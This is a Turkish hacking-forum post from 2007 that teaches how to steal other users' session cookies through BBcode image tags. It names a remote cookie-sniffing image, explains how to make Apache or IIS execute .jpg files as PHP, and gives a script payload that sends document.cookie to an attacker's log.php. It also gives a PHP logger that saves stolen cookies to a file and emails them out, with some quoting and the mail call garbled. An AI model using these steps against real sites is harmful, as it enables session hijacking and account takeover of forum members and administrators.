PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 BBcode kullanarak Cookie Calmak

Aşağa gitmek 
YazarMesaj
H@CKER
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 468
Şehir : www.hackturkiye.ile.biz
Meslek : H@CKER\'LİK
Kayıt tarihi : 12/08/07

MesajKonu: BBcode kullanarak Cookie Calmak   Ptsi Ağus. 20, 2007 2:49 pm

Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.

Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.

Foruma mesaj atarken IMG tag ı içine http://antichat.ru/cgi-bin/s.jpg bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi http://antichat.ru/sniff/log.php adresinde loglanıcaktır.



Peki gelelim http://antichat.ru/cgi-bin/s.jpg nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.

Serverınızda apache veya IIS kurulu ise yapmanız gerekenler

Apache için

Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz

IIS de bu işlemi

Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.

Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine

<script>document.location=?http://www.site.com/log.php??+escape(document·cookie)</script> yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmak

Log.php kodları:

<?php
$kayit = fopen(\"ekledik.txt\",\"a\");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . \": \" . $value . \"n\");
}
fwrite($kayit,\"---------------------------n\");
fclose($kayit);
mail(\" mailadresiniz@mail.com,Şifre Geldi çip çip \",\": [email]Taze_Kek@geldi.com?);[/email]
?>
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
BBcode kullanarak Cookie Calmak
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: